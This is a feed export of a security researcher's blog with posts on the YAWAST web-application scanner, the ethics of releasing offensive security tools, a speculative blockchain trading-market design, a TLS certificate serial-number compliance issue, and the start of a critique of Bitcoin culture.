Adam Caudill Security Consultant, Researcher, & Software Developer 2020-01-06T17:56:07Z WordPress Adam Caudill <![CDATA[YAWAST: News & Mission]]> 2020-01-05T05:17:11Z 2020-01-05T05:17:11Z It’s been some time since I last wrote about YAWAST on here, it was actually back in April when I posted the last update – that was for the release of YAWAST v0.7.0. Currently, it’s at version 0.11.0 and a lot has changed. It’s been rewritten from scratch, more people have become involved, it has… Continue reading YAWAST: News & Mission

The post YAWAST: News & Mission appeared first on Adam Caudill.


It’s been some time since I last wrote about YAWAST on here, it was actually back in April when I posted the last update – that was for the release of YAWAST v0.7.0. Currently, it’s at version 0.11.0 and a lot has changed. It’s been rewritten from scratch, more people have become involved, it has moved to a (fairly) regular release cycle, and has expanded a fair bit in terms of functionality.

This is somewhat about the changes, but it’s more about the mission of YAWAST, and what I am working to achieve.

The Rewrite

When I last wrote here about YAWAST, it was written in Ruby, it’s now Python – it was (quite obviously) rewritten from the ground up. Made more stable, easier to extend, more flexible, and far more thorough. The reason for the rewrite was quite simple, it was a poll I posted to Twitter:

What we see here is that there is actually quite a difference in the likelihood that someone would contribute to YAWAST based on what language it was written in. When I wrote the first lines of code for it back in 2013, Ruby was a favorite language among security-focused developers – most likely due to the fact that Metasploit Framework is written in Ruby. Fast forward 6 years, and Ruby received only 5.6% of the vote, while Python received a massive 55.6% of the vote.

For a tool like this to gain long-term success, it’s important that it become more than a one person show. With this in mind, I started the process of rebuilding YAWAST from scratch – this was a huge time investment, working a full-time job during the day, then working till 3AM most days on the rewrite. While that was a huge short-term investment, it was an investment in the future.

This rewrite provided an excellent opportunity to completely rethink the architecture of the tool – as it was becoming more complex, the older architecture was becoming a substantial limitation, making it difficult to achieve the level of coverage I desired. Now, it’s easy to add new checks, and add them in a far more efficient manner that what was possible in the past. The investment opened the door to making the tool far more useful, and far more effective.

The Mission

When performing a penetration test1 against a web application, there are a huge number of things that a tester needs to look for – especially early on. The goal of YAWAST is to make the first hours of a penetration test as efficient as possible. There are a few ways that it works towards that:

  • It checks for as many issues as possible (that are suited to automation).
  • It provides both detailed output to the console, as well as a machine readable JSON file that can be used in conjunction with reporting tools to simplify the reporting process.
  • Once an issue is identified, the tester no longer needs to worry about it. This allows a tester to run YAWAST at the start of a test, and within a matter of minutes, they have eliminated a number of items from their to-do list.

By eliminating as many issues as possible at the start of an engagement, it’s possible to spend more time focused on what penetration testers do best: leverage their extensive experience and knowledge to find issues that no scanner ever will. YAWAST isn’t meant to provide an assessment on it’s own – that’s simply not the goal, the goal is to allow more time and focus to be spent on manual testing (where the real value is).

I have devoted much of my career to making teams more effective, and that means identifying areas where productivity, focus, and energy are being lost, and taking advantage of technology to address those issues. I did this in development, and I do this today in application security. It’s no secret that time for a penetration testers isn’t cheap, and it should be used as efficiently as possible to produce the best possible results.

The goal of YAWAST is, simply put, to make penetration testers more efficient.

  1. When I use the term penetration test here, what I am actually referring to is a combination penetration test and vulnerability analysis. I am a firm believer that combining these two provides that most useful results, with the greatest long term positive impact. 

The post YAWAST: News & Mission appeared first on Adam Caudill.

Adam Caudill <![CDATA[Utilitarian Nightmare: Offensive Security Tools]]> 2020-01-06T17:56:07Z 2020-01-04T09:39:41Z Or: Ethical Decision Making for Security Researchers There has been much discussion recently on the appropriateness of releasing offensive security tools to the world – while this storm has largely come and gone on Twitter, it’s something I still find myself thinking about. It boils down to a simple question, is it ethical to release… Continue reading Utilitarian Nightmare: Offensive Security Tools

The post Utilitarian Nightmare: Offensive Security Tools appeared first on Adam Caudill.

Or: Ethical Decision Making for Security Researchers

There has been much discussion recently on the appropriateness of releasing offensive security tools to the world – while this storm has largely come and gone on Twitter, it’s something I still find myself thinking about. It boils down to a simple question, is it ethical to release tools that make it easy for attackers to leverage vulnerabilities that they wouldn’t otherwise be able to?

I’ve written about the ethics of releasing this type of information before (On The Ethics of BadUSB, Responsible Disclosure Is Wrong), and I’ve always believed that it should be addressed on a case by case basis, based on what is best for end-users. What action protects them most effectively?

The problem with that though is that it’s a highly subjective standard, and if you ask 10 security researchers where the line is, between helping and harming users, you’ll likely to get at least 10 answers. Perhaps to drive this conversation forward, we need to look beyond our own gut feelings and personal positions to a more accepted framework to determine what releases are ethical, and releases aren’t.

Enter Utilitarianism

utilitarianism is generally held to be the view that the morally right action is the action that produces the most good … bringing about the greatest amount of good for the greatest number – The History of Utilitarianism, Julia Driver

Jeremy Bentham by Henry William Pickersgill

While I personally find utilitarianism to be a most useful philosophy in general, in questions such as this, where as a security researcher you are making a decision that can impact vast numbers or people, it’s especially useful. Relying an a well studied model to determine if your decisions are sound is often a good idea – what seems right to you, may be skewed by personal interest, bias, ego, or naivety.

While there’s no need to go into the details of utilitarianism in great detail here, as it’s documented and discussed at great length by others, it is useful to understand some of the basics, especially as they apply to security research, and to the release of tools that may put people at risk. This is an incredibly complex topic, and one that has been debated ad naseum for many years, and, in all honesty, one that will continue to be debated for many years to come. Hopefully though, a brief discussion on the ethics of this issue from a philosophical perspective will help you in your future decisions.

There are a few things about utilitarianism that are of particular importance for this discussion:

  • Positive impact is impartially considered. What is good for you, is no more important than what is good for any other person. This is a critical aspect to understand, and one that mustn’t be ignored. If you place your own interests above those of others, you are discounting the impact of the decision on on others – quite likely resulting in a choice that has an outsized negative impact without realizing it.
  • Happiness is the only thing that has intrinsic value. Security provides happiness in that it makes people feel safe, and reduces the risk of being unhappy should they suffer an attack in the future. In this philosophical view, technical security has no intrinsic value whatsoever. This is sometimes difficult to process for those that have built their career around security – we work very hard to make the world a safer place through technical skills and extensive knowledge, but it’s the result that effort has on people (making them happy) that has value.
  • It’s the consequences that matter. Utilitarianism is a consequentialist philosophy, all that matters is the impact of a decision. Your motives for releasing something to the world are actually irrelevant, it doesn’t matter if your underlying motivation was to make people safer or to sink the stock of a company – what matters is how much happiness you added to the world, versus the amount of unhappiness. Having good intentions doesn’t make a decision ethical if the impact is negative.

With these three key points, we can begin to breakdown the decision making process and try to identify if a decision is ethical or not.

Utility Calculus

The father of modern utilitarianism, Jeremy Bentham, helpfully developed a formula to determine if an action is ethical; here is a somewhat simplified version of that formula:

  • Intensity – How strong is the feeling of happiness?
  • Duration – How long does the happiness last?
  • Certainty – How likely is the happiness to actually occur?
  • Immediacy – How soon will the happiness occur?
  • Productivity – How likely is this happiness to lead to further happiness?
  • Purity – How likely is this happiness to lead to future unhappiness?
  • Extent – How many people with this make happy?

For some things, it’s easy to determine if a decision is ethical – for example, donating money to a food bank. On one hand, you are losing money that could have been used to made yourself happy. On the other hand, it will likely make several other people far happier than you would have been, it will have a quick impact, it may lead to avoiding illness due to a better diet, it’s unlikely to lead to future negative effects, and there is little doubt that it will actually have that positive impact. In this case, there’s no real doubt that it is, in fact, an ethical choice to make.

Not everything is this simple though. A couple years ago I wrote about breaking encryption used by ransomware, complete with the full details of the mistakes that the author made. This is a more complex situation, and some were very vocal in stating that they thought it wasn’t ethical to disclose all of the details. In this case, I was informing defenders of an approach that could lead to recovering data that had been encrypted by this malware, informing developers on how to build more secure applications by learning lessons from a public failure, and inspiring those that have to deal with ransomware to look into an approach that they could consider in future cases. I was also making it easy for the developers of the ransomware to fix their mistakes by explaining exactly what they did wrong. My belief when I wrote that article was that it would be a net positive, even in the unlikely case that the developer of the ransomware found my article and corrected their mistakes. Was it actually ethical? I’m still not sure.

The Nightmare

As with my example about the ransomware above, offensive security tools are not nearly so easy to analyze. There are many factors that need to be considered, and then, and only then, can a determination be made as to the true impact.

  • Would an attacker of average skill be able to discover how to exploit a vulnerability if the tool wasn’t released?
  • Is there a patch available to address the issue?
    • If yes:
    • Have users had reasonable amount of time to install it?
    • Will releasing the tool now lead to more systems being patched?
    • In no:
    • Will making a tool available lead to a patch being available sooner?
    • Is there a work-around available to allow users to protect themselves?
  • If there is no tool available, will users be able to reasonably determine if they are impacted?
    • Will users be able to detect the issue in an automated fashion if no tool is released?
  • Is there a way to protect users from attackers, without giving attackers full information on how to exploit an issue?
    • Will withholding a tool lead to a false sense of security or delay patching?
  • What is the likelihood that attackers will leverage the tool against users?

There are many more questions that could be asked of course, but these are some of the basics that should be considered when determining what goes public (and when). As a researcher, determining what is released to the public is a significant decision, and one that places a great deal of responsibility on the researcher to determine the best approach for a given situation. There is no single rule that will ever be right for every situation, many factors must be weighed and reweighed as information changes, and it this process of asking questions that will allow researchers to make the best decision possible – the best decision for the greatest number of people.

I have often described security research as being in a perpetual gray area, where the lines of right and wrong, ethical and unethical are unusually blurry. Some things are clear and without question, but many things exist in a more complex state. As a researcher it’s important to find a way to break down your own decision making to ensure that what you are doing is actually in the best interest of users.


That’s fine.

While this presents what I consider to be the best philosophy to evaluate the ethics of a decision as a researcher, it is not the only method, and may not be the best for you. It’s unlikely that any single philosophy will ever be accepted by everyone, but what is important is that everyone that takes on the weighty decisions that can have a substantial impact on other people evaluate how they are coming to decisions, and find an approach that ensures that it’s truly ethical.

The post Utilitarian Nightmare: Offensive Security Tools appeared first on Adam Caudill.

Adam Caudill <![CDATA[Insane Ideas: Blockchain-Based Automated Investment System]]> 2019-09-10T02:50:33Z 2019-09-10T02:50:33Z This is part of the Insane Ideas series. A group of blog posts that detail ideas, possible projects, or concepts that may be of interest. These are ideas that I don’t plan to pursue, and are thus available to any and all that would like to do something with them. I hope you find some… Continue reading Insane Ideas: Blockchain-Based Automated Investment System

The post Insane Ideas: Blockchain-Based Automated Investment System appeared first on Adam Caudill.

This is part of the Insane Ideas series. A group of blog posts that detail ideas, possible projects, or concepts that may be of interest. These are ideas that I don’t plan to pursue, and are thus available to any and all that would like to do something with them. I hope you find some inspiration – or at least some amusement in this.

A few months ago I was reading about high-frequency trading (HFT) – algorithms that allow investors to make money essentially out of nothing by executing trades at high speed, and leveraging the natural (and artificial) volatility of the market. While contemplating how HFT could be applied to a blockchain environment, I had an idea that I considered to be equal parts brilliant and insane (as described to a friend of mine):

A blockchain/smart contract based market; functioning similar to a stock market, but instead of holding shares in a company, you hold shares of a contract. Contracts will automatically trade in shares of other contracts to generate profit; contracts that perform well will have more demand, and thus be worth more.

Rules limit the maximum time a contract can hold shares and a requirement that a contract hold at least N% of its value in shares of other contracts will ensure constant trading activity. Each contract is essentially a HFT system trading against all the other contracts.

With the ability to trade options on other contracts, it would produce a very dynamic market that exists for the sole purpose of making money.

This is a market that is intended to be volatile, constantly changing, with new smart contracts being created and closed frequently. There would be immense pressure to create ever more sophisticated contracts that can outperform the competition. This rapid evolution would allow those that choose well to make a substantial profit. Of course, though that pick their investments poorly will find losses mounting up very quickly.

This is, simply put, crazy. It’s a very high risk / high reward system that is designed for investors that are willing to take substantial risks – though the upside could also be substantial.

This project became something of a thought experiment, and what follows is the start of a high-level specification for this system. This isn’t complete, though could have some value to someone – it has no value being unseen in my notes.

Please note: The following contains opinions on legal matters. I am not an attorney, nor is this legal advice. Please consult with an attorney should you decide to pursue a concept like this, as it’s highly likely that they will have many opinions that you should listen to.


This document describes a novel blockchain-based investment system, designed to provide a fair market using smart contracts that engage in automated trading. These smart contracts issue shares, allowing investors to profit from their performance.

The network uses a hybrid centralized-decentralized approach to ensure the level of performance needed to achieve the goals stated and rapid trading activity. Using a truly decentralized approach is likely not possible for a variety of reasons, though pursuing such a design would present some novel problems that are worthy of future research.


This document uses the following definitions throughout.

Coin – This is the “currency” of the system, used to purchase shares from contracts, and used by contracts to purchase shares of other contracts. Coin is issued by a special contract, and is a Network Token, no different than the tokens that represent shares of a contract.

Network Token – This is a token that represents value in the network, it may represent Coin, or shares of a contract. Each token includes the identification of the contract that it originates from.

Potential Legal / Tax Issues

Securities – It’s possible that the contract shares could be seen by the SEC as a security. This would need to be reviewed by an expert in this area of law to determine what compliance steps would be needed.

Capital Gains – The tax implications of this type of trading isn’t clear. This will need to be reviewed, to determine the tax implications of this design and how best to handle these issues.

Block Generator

The Block Generator is an elected system, from among the Block Signers, that will be responsible for collecting Commitments from the network, and producing a new block every blockGenerationTime seconds. The Commitments will be added to a block, and signed by the Block Generator, it will then send the new block to each of the Block Signers for their signatures. Each Block Signer will return their signature of the block. The Block Generator will then broadcast the new block to the network.

The Block Generator will only publish blocks that have at least blockMinimumSigners signatures, excluding its own. The Block Generator SHOULD publish a block as soon as it has received enough signatures to satisfy the blockMinimumSigners requirement.

Given the importance of quickly producing blocks to the system, the Block Generator should be a highly redundant system, resilient to common disruptions.

Block Generation Reward

Given the critical role that the Block Generator and the other Block Signers play, a reward is issued on the creation of each block. When a new block is created, the Coin Contract will mint new Coin, and distribute it evenly among those that signed the block, including the Block Generator.

No reward is generated for special purpose blocks.

Operating Fees

To ensure the continued health of the network, there are certain operating fees that are charged to each contract on a weekly basis. These fees are a percentage of the total value of the contract, and defined in the Network Parameters. These fees are:

Network Operator Fee – To cover the cost of operating and scaling the underlying network.

Coin Contract Operator Fee – To cover the administrative, security, and other costs of maintaining the contract configuration and protecting the assets held by the contract.

Founders Fee – This fee is paid to the founders of the network, to enable them to recover development costs, and continue to invest in improving the network.

These fees are payable via Coin or shares of the contract they are charged against. All contracts, other than the Coin Contract and Closed contracts must pay these fees. If multiple addresses are listed for any fee, the payment MUST be split evenly between these addresses.

Network Parameters

Multiple items in the investment contracts and other network components refer to agreed upon configuration items. These items will be retrieved from the most recent Network Parameters special block. This block will contain a single record containing a JSON document which defines all parameters needed for the network to function.

This values include:

  1. blockGenerationTime (in seconds)
  2. blockGenerator (public key & address, 1 item)
  3. blockSigners (public key & address, multiple items)
  4. blockMinimumSigners (int, must be less than blockSigners)
  5. blockProductionReward (int)
  6. contractMinimumSharePrice (int, in Coin)
  7. contractMaximumShareHoldTime (in seconds)
  8. contractMinimumShareHoldTime (in seconds)
  9. contractMaximumManagerFee (percentage of contract value, decimal)
  10. contractMaximumManagerShare (percentage of contract share, decimal)
  11. contractNetworkOperatorFee (percentage of contract value, decimal)
  12. contractNetworkOperatorFeeAddress (address list)
  13. contractFoundersFee (percentage of contract value, decimal)
  14. contractFoundersFeeAddress (address list)
  15. contractCoinContractOperatorFee (percentage of contract value, decimal)
  16. contractCoinContractOperatorFeeAddress (address list)

A new Network Parameters block may be generated by any Block Signer, and must be signed by blockMinimumSigners, excluding the Block Signer that generated the block. Should the Block Generator become unavailable, the Block Signers MUST elect a new Block Generator, and produce a new Network Parameters block.


All contracts are immutable, and may not be change, amended, or otherwise altered once they are created. While not allowing updates does complicate the situation should a vulnerability be discovered, it is the only way to ensure that a contract can not be updated in a way that would enable fraudulent activity once it has established value.

All contract code will be included in the special purpose block that creates the contract, making the source code public. Portions of the code, including the code that processes the New Block Action, may be encrypted using a key available to the Contract Execution Servers, provided that the Contract Manager provides a code review report from an approved security vendor to the public, and requests approval from operators of all Block Signers. The Block Signer operators may approve or reject the request at their discretion. Partially encrypted contracts are allowed to protect sensitive strategy information that may be critical to contract performance.

When a contract is created, it defines a certain number of shares, which it will initially own all of. It is not possible for a contract to issue additional shares, or to perform stock splits, or reverse splits. The number of existing shares is immutable.

Contracts have four states that they may exist in:

Active – Contract is live, and may engage in normal activity.

Restricted – A contract may be placed in a Restricted state, meaning that no activity is permitted. The New Block Action will not be executed, it will not be permitted to sell shares of itself, buy shares, or otherwise engage in normal trading. A contract may be Restricted, or have its state changed to Active by a special purpose block. The purpose of this state is to minimize risk should a vulnerability be discovered. In the Restricted state, the Contract Manager may opt to closing the contract, by changing its state to Closing.

Closing – When a contract state is changed to Closing, the contract will begin a shutdown process, liquidating its assets and halting its normal trading activity. Once a contract has been placed in Closing, it can not be changed back to Active. When the contract has liquidated all assets, holding only Coin and its own shares, it will move to the Closed status.

Closed – When a contract enters the Closed state, which is only possible by going through the Closing state, the contract will issue a Repurchase transaction for all outstanding shares, and cease all activity. The contract distributes all Coin it holds via the Repurchase; when completed, the will hold only shares of itself.

Closing A Contract

At the end of the life of a contract, the holder of the contracts private key SHALL trigger the contract to close. When a contract is closed, the following actions are taken:

  1. The contract stops all direct sales of its own shares, if any are remaining.
  2. The contract stops all purchases of shares using its own shares as the currency (Share Swapping).
  3. The contract stops all purchase using Coin as the currency.
  4. The contract sells shares in other contracts only for Coin.
  5. When all assets have been sold, the contract will issue a Repurchase transaction for all outstanding shares, calculating the price based on total Coin held divided by the number of outstanding shares.

Contract Execution

All contracts will be executed via Contract Execution Servers that are operated by the Network Operator.

Purchasing Contract Shares

Contract shares may be purchased via an exchange, or from the contract directly. Shares purchased from the contract have a minimum price of contractMinimumSharePrice per full share; this is to ensure that new contracts are able to gain adequate funding to operate.

Shares of a contract may be purchased either as full shares (1.0 share), or as a fractional share.

The Coin Contract

The Coin Contract is a special purpose contract that backs all Coin issued within the system. It acts as the value store backing Coin, receiving payments in cryptocurrencies, and returning new Coin in exchange. The Coin Contract will also repurchase Coin, transferring cryptocurrency for Coin received; Coin received via this system will be burned and removed from circulation.

The Coin Contract acts much like a regular contract from a functional perspective, except that it is the only contract that is able to produce new tokens beyond those created when the contract was created.

Coin is created via two mechanisms:

  1. Direct Purchase – When Coin is purchased from the Coin Contract via another currency, new Coin is produced.
  2. Block Generation Reward – When a new block is generated, new Coin is produced as a reward and to cover operations expense for the system operators.

The Coin Contract operator SHALL chose which cryptocurrencies are accepted, and which, if any, are thereafter converted to another cryptocurrency. The Coin Contract may not hold any reserves in Coin, or any other tokens from this network; all value must be stored in an outside value store.

The Coin Contract will use multiple sources of data, whenever possible, to determine the appropriate exchange rates.

Coin Contract Operator

As the Coin Contract holds value outside of the system, it must have an operator that is responsible for the security of its holdings, and updating its configuration. This operator should be a distinct legal entity, with oversight that is independent from the rest of the system.

The Coin Contract Operator SHOULD publish regular reports listing the status of the accounts held for the Coin Contract, and engage with a reputable auditor to provide assurance that the funds are secured.

The Coin Contract Operator SHOULD place funds in excess of what is needed for the Coin Contract to operate for 30 days with a fully independent custodian, such as a regulated financial institution.

Funds held for the Coin Contract MUST NOT be used for operating or other expenses by any party.

Contract Manager

The Contract Manager is the party that holds the private key for a contract, allowing them to update the contract’s configuration and change the state to Closing.

The Contract Manager MAY charge a fee against the contract, based on a percentage of total value, up to contractMaximumManagerFee. Any fee specified by the contract that exceeds contractMaximumManagerFee will be reduced to contractMaximumManagerFee.

Upon creation of a contract, the Contract Manager MAY receive shares automatically from the contract, based on a percentage of total shares, not to exceed contractMaximumManagerShare. The Contract Manager may purchase additional shares through the normal mechanism and at market rates.

Network Operator

The network operator is responsible for maintaining the components of the system that can not be decentralized while maintaining the level of performance required.

The Network Operator SHALL operate a number of Contract Execution Servers sufficient to process all contracts with minimal delay after a new block is broadcast.

The Network Operator SHALL operate a public exchange, with minimal fees, supported by the Network Operator Fee, to allow users to easily buy, sell, and trade Coin and contract shares.

The Network Operator SHALL employ reasonable security measures for all systems they operate for the network.

If the Network Operator also operates Block Signers, the number of Block Signers they operate MUST be less than 50% of blockMinimumSigners to minimize the risk that the Network Operator is able to perform fraudulent activity.

The post Insane Ideas: Blockchain-Based Automated Investment System appeared first on Adam Caudill.

Adam Caudill <![CDATA[YAWAST v0.7 Released]]> 2019-04-19T19:51:31Z 2019-04-19T19:51:31Z It has now been over a year since the last major release of YAWAST, but today I am happy to release version 0.7, which is one of the largest changes to date. This is the result of substantial effort to ensure that YAWAST continues to be useful in the future, and add as much value… Continue reading YAWAST v0.7 Released

The post YAWAST v0.7 Released appeared first on Adam Caudill.

It has now been over a year since the last major release of YAWAST, but today I am happy to release version 0.7, which is one of the largest changes to date. This is the result of substantial effort to ensure that YAWAST continues to be useful in the future, and add as much value as possible to those performing security testing of web applications.

If you are using the Gem version, simply run gem update yawast to get the latest version.

JSON Output

One of the headline features is that YAWAST now supports producing JSON output via the new --output=<file> parameter. This will create a JSON file that can be used to record the actions of YAWAST in more detail, and be used in reporting automation. The goal of this feature is to capture all of the information that is needed to produce a report automatically.

If you specify --output=. or --output=/path/., YAWAST will automatically generate a file name based on the domain name and current time.

The overall structure of the JSON output shouldn’t change, but the details included may change over time as the output is refined to make it as useful as possible.

Enhanced Vulnerability Scanner

The other major change in this version is the new vulnerability scanner, which adds a number of new checks, and opens the door to more easily adding checks in the future. This is currently accessed via the --vuln_scan parameter, as this is seen as a beta-level feature; when used without that parameter, YAWAST behaves as it has in the past. In the future, this will become of the default behavior, once it’s clear that it is stable.

It is recommended that you use --vuln_scan unless it is causing issues for you (and if it does cause issues, please open an issue).

One behavioral change is that the new --spider option works differently in each mode; --vuln_scan will always spider the site, so in that mode, --spider simply adds printed output to the UI listing the URLs found.

This new scanner leverages Chrome via an automated interface to perform certain tasks, that can only be properly tested by browser interaction; this adds some new dependencies, though the application should fail gracefully if these aren’t present.

The YAWAST Docker image has been updated to work with this new feature, making it the easiest way to use it.

User Enumeration via Password Reset Form (Timing & Response)

One new experimental feature that I would like to point out is that YAWAST will attempt to use the target application’s Password Reset Form (specified via --pass_reset_page) using Chrome automation to capture the difference between a valid user (specified via --user) and a randomly generated invalid user. It will compare the responses and display a diff of the changes between the two.

YAWAST will attempt to automatically identify the form field that captures the username / email address, if it fails to find the field, it will prompt you to provide the name or id.

It will run this procedure a total of 5 times, and capture of the timing that each request took, to determine if timing information can be used to determine valid users.

[V] Password Reset: Possible User Enumeration - Response Timing (see below for details)
    Difference in average: 368.6ms  Valid user: 736.15ms  Invalid user: 367.55ms
    Valid Users     Invalid Users
         990.15            598.39
         727.22            312.19
         679.86            303.05
         796.91            319.85
         486.62            304.27

Change Log

Here is a list of the changes included in this version:

  • #38 – JSON Output Option via --output= (work in progress)
  • #133 – Include a Timestamp In Output
  • #134 – Add options to DNS command
  • #135 – Incomplete Certificate Chain Warning
  • #137 – Warn on TLS 1.0
  • #138 – Warn on Symantec Roots
  • #139 – Add Spider Option
  • #140 – Save output on cancel
  • #141 – Flag –internalssl as Deprecated
  • #147 – User Enumeration via Password Reset Form
  • #148 – Added --vuln_scan option to enable new vulnerability scanner
  • #151 – User Enumeration via Password Reset Form Timing Differences
  • #152 – Add check for 64bit TLS Cert Serial Numbers
  • #156 – Check for Rails CVE-2019-5418
  • #157 – Add check for Nginx Status Page
  • #158 – Add check for Tomcat RCE CVE-2019-0232
  • #161 – Add WordPress WP-JSON User Enumeration
  • #130 – Bug: HSTS Error leads to printing HTML
  • #132 – Bug: Typo in SSL Output
  • #142 – Bug: Error In Collecting DNS Information

The post YAWAST v0.7 Released appeared first on Adam Caudill.

Adam Caudill <![CDATA[TLS: 64bit-ish Serial Numbers & Mass Revocation]]> 2019-03-12T21:34:45Z 2019-03-10T00:02:40Z During a recent discussion about the DarkMatter CA on a Mozilla mailing list, it was found that their 64-bit serial numbers weren’t actually 64 bits, and it opened a can of worms. It turns out that the serial number was effectively 63 bits, which is a violation of the CA/B Forum Baseline Requirements that state… Continue reading TLS: 64bit-ish Serial Numbers & Mass Revocation

The post TLS: 64bit-ish Serial Numbers & Mass Revocation appeared first on Adam Caudill.

During a recent discussion about the DarkMatter CA on a Mozilla mailing list, it was found that their 64-bit serial numbers weren’t actually 64 bits, and it opened a can of worms. It turns out that the serial number was effectively 63 bits, which is a violation of the CA/B Forum Baseline Requirements that state it must contain 64 bits of output from a secure random number generator (CSPRNG). As a result of this finding, 2,000,000 certificates or more may need to be replaced by Google, Apple, GoDaddy and various others.

Update: GoDaddy initially said that more than 1.8 million of their certificates were impacted; they have drastically reduced this number in an update posted on 2019-03-12. The fully number of certificates impacted by this is still being discussed.

It’s quite likely that the full scope of this problem hasn’t been determined yet.

The Problem

During an analysis of certificates issued by DarkMatter, it was found that they all had a length of exactly 64 bits – not more, not less. If there’s a rule that requires 64 bits of CSPRNG output, and the serial number is always 64 bits, at first glance this seems fine. But, there’s a problem, and it’s in RFC 5280; it specifies the following:

The serial number MUST be a positive integer assigned by the CA to each certificate. It MUST be unique for each certificate issued by a given CA (i.e., the issuer name and serial number identify a unique certificate). CAs MUST force the serialNumber to be a non-negative integer.

Requiring a positive integer means that the high bit can’t be set – if it is set, it can’t be used directly as a certificate serial number. As such, if the high bit is set, there are two1 possible options:

  1. Pad the serial with an additional byte, so that the full 64 bits of output is used.
  2. Discard the value, and try again until you get a value without the high bit set. This means that the size is always 64 bits, and the high bit is always 0 – giving you 63 effective bits of output.

A popular software package for CAs, EJBCA had a default of using 64-bit serial numbers, and used the second strategy for dealing with CSPRNG output with the high bit set. This means that instead of using the full 64-bit output, it effectively reduced it to 63 bits – cutting the number of possible values in half. When we are talking about numbers this large, it’s easy to think that 1 bit wouldn’t make much difference, but the difference between 2^64 and 2^63 is substantial – to be specific, 2^63 is off by over 9 quintillion or more specifically 9,223,372,036,854,775,808.

The strategy of calling the CSPRNG until you get a value that has the high bit unset violates the intention of the rule imposed by the Baseline Requirements, meaning that all certificates issued using this method were mis-issued. This is a big deal, at least for a few CAs and their customers.

Now, the simple solution to this is to just increase the length of the serial beyond 64 bits; for CAs that used 72 or more bits of CSPRNG output, this is a non-issue, as even if they coerce the high bit, they are still well above the 64-bit minimum. This is a clear case of following a standard as close to the minimum as possible, which left no margin for error. As the holders of those 2+ million certificates are learning, they cut it too close.

The Rule

The Baseline Requirements are the minimum rules2 that all CAs must follow; these rules are voted on by a group of browser makers and CAs, and often debated in detail. Thankfully for all involved, much of these discussions happen on public mailing lists, so it’s easy to see what’s been discussed and what the view of the different parties were when a change was approved. This is a good thing when it comes to understanding this issue.

The relevant rule in this case is in section 7.1:

Effective September 30, 2016, CAs SHALL generate non-sequential Certificate serial numbers greater than zero (0) containing at least 64 bits of output from a CSPRNG.

On a prima facie reading of this requirement, it appears that the technique that EJBCA used could be valid – it is the output of a CSPRNG, and it is 64 bits. However, the Baseline Requirements can’t be read so simply, you have to look deeper to find the full intention. In this case, the fact that 1 bit would be lost in a purely random serial was pointed out by Ryan Sleevi of Google and Ben Wilson of DigiCert. This fact is not pointed out in the requirement itself, but is available to anyone that spends a few minutes looking at the history3 of the requirement.

With a deeper reading, it’s clear that a 64-bit serial, the smallest permitted, in quite likely to be a violation of the Baseline Requirements. While you can’t look at a single certificate to determine this, looking at a larger group will reveal if the certificate serial numbers are consistently 64 bits, in which case, there could be a problem.

Mass Revocation

When a certificate is issued that doesn’t meet the Baseline Requirements, the issuing CA is required to take quick action. Once again, the we look to the Baseline Requirements ( to find guidance:

The CA SHOULD revoke a certificate within 24 hours and MUST revoke a Certificate within 5 days if one or more of the following occurs: … 7. The CA is made aware that the Certificate was not issued in accordance with these Requirements or the CA’s Certificate Policy or Certification Practice Statement; …

This makes it clear that the CA has to revoke any certificate that wasn’t properly issued within 5 days. As a result, CAs are under pressure to address this issue as quickly as possible – replacing and revoking certificates with minimal delay to avoid missing this deadline. Google was able to revoke approximately 95% of their mis-issued certificates within the 5 days, Apple announced that they wouldn’t be able to complete the process within 5 days, and GoDaddy stated that they would need 30 days to complete the process. The same reason was cited by all three: minimizing impact. Without robust automation4, changing certificates can be complex and time-consuming, leaving the CA to choose between complying with requirements or impacting their customers.

Failing to comply with the Baseline Requirements will complicate audits, and could put a CA at risk of being removed from root stores.

The Impact

The full impact of this issue is far from known. For Google and Apple, both in the process of replacing their mis-issued certificates, they were only issued to their own organizations – reducing the impact. On the other hand GoDaddy, which has mis-issued more than 1.8 million certificates5, is facing a much larger problem as these were certificates issued to customers. Customers that are likely managing their certificates manually, and will require substantially longer to complete the process.

It’s also not clear how many other CAs may be impacted by this issue; while a few have come forward, I would be shocked if this is the full list. This is likely an issue that will live on for some time.

[Note on DarkMatter: This post is solely about the issue with serial numbers discovered as a result of the discussion around DarkMatter operating as a trusted CA in the Mozilla root store. It does not take any position on the issue of DarkMatter being deserving of such trust, which is left as an exercise for the reader.]

[Note on Exploitation Risk: Entropy in the serial number is required as a way to prevent hash collisions from being used to forge certificates; this requires an ability to predict or control certificate contents and the use of a flawed hashing algorithm, adding a random value makes this more difficult. This type of issue has been exploited with MD5, and could someday be exploited with SHA1; there’s no known flaws in the SHA2 family (used in all current end-entity certificates) that would allow such an attack. In addition, while due to this issue, the level of protection is reduced by half, 2^63 is still a large number and provides a substantial amount of safety margin.]

  1. There may be additional ways of handling this situation, though these are the most likely. Other methods may or may not actually be compliant with the Baseline Requirements. 
  2. Root store programs have their own rules which CAs must follow that go beyond the Baseline Requirements (BRs); as such, the BRs are not the final word in what is required, but a set of minimum requirements that all involved have agreed to. 
  3. Given the complex and sometimes adversarial nature of the CA/B Forum, even small and obvious changes are sometimes debated for extended periods. This makes updating the BRs more complex than it should be, and appears to drive changes to be as minimal as possible to avoid conflict. In an ideal world, CA/B Forum would produce an annotated version of the BRs that offer additional insight into the rules, their origins, and their intentions. In the world we live in, that would require a level of cooperation and coordination that is exceedingly unlikely. 
  4. With events like this, Heartbleed, and others that can lead to certificates being revoked with short notice, using robust automation to manage certificates is the only logical way forward. While this makes some people uncomfortable, manual management exposes organizations to far greater risk. 
  5. At the time of writing, these are preliminary numbers; the number of certificates that are being reissued is not clear. 

The post TLS: 64bit-ish Serial Numbers & Mass Revocation appeared first on Adam Caudill.

Adam Caudill <![CDATA[Bitcoin is a Cult]]> 2018-06-22T03:33:33Z 2018-06-22T03:33:33Z The Bitcoin community has changed greatly over the years; from technophiles that could explain a Merkle tree in their sleep, to speculators driven by the desire for a quick profit & blockchain startups seeking billion dollar valuations led by people who don’t even know what a Merkle tree is. As the years have gone on,… Continue reading Bitcoin is a Cult

The post Bitcoin is a Cult appeared first on Adam Caudill.

The Bitcoin community has changed greatly over the years; from technophiles that could explain a Merkle tree in their sleep, to speculators driven by the desire for a quick profit & blockchain startups seeking billion dollar valuations led by people who don’t even know what a Merkle tree is. As the years have gone on, a zealotry has been building around Bitcoin and other cryptocurrencies driven by people who see them as something far grander than they actually are; people who believe that normal (or fiat) currencies are becoming a thing of the past, and the cryptocurrencies will fundamentally change the world’s economy.

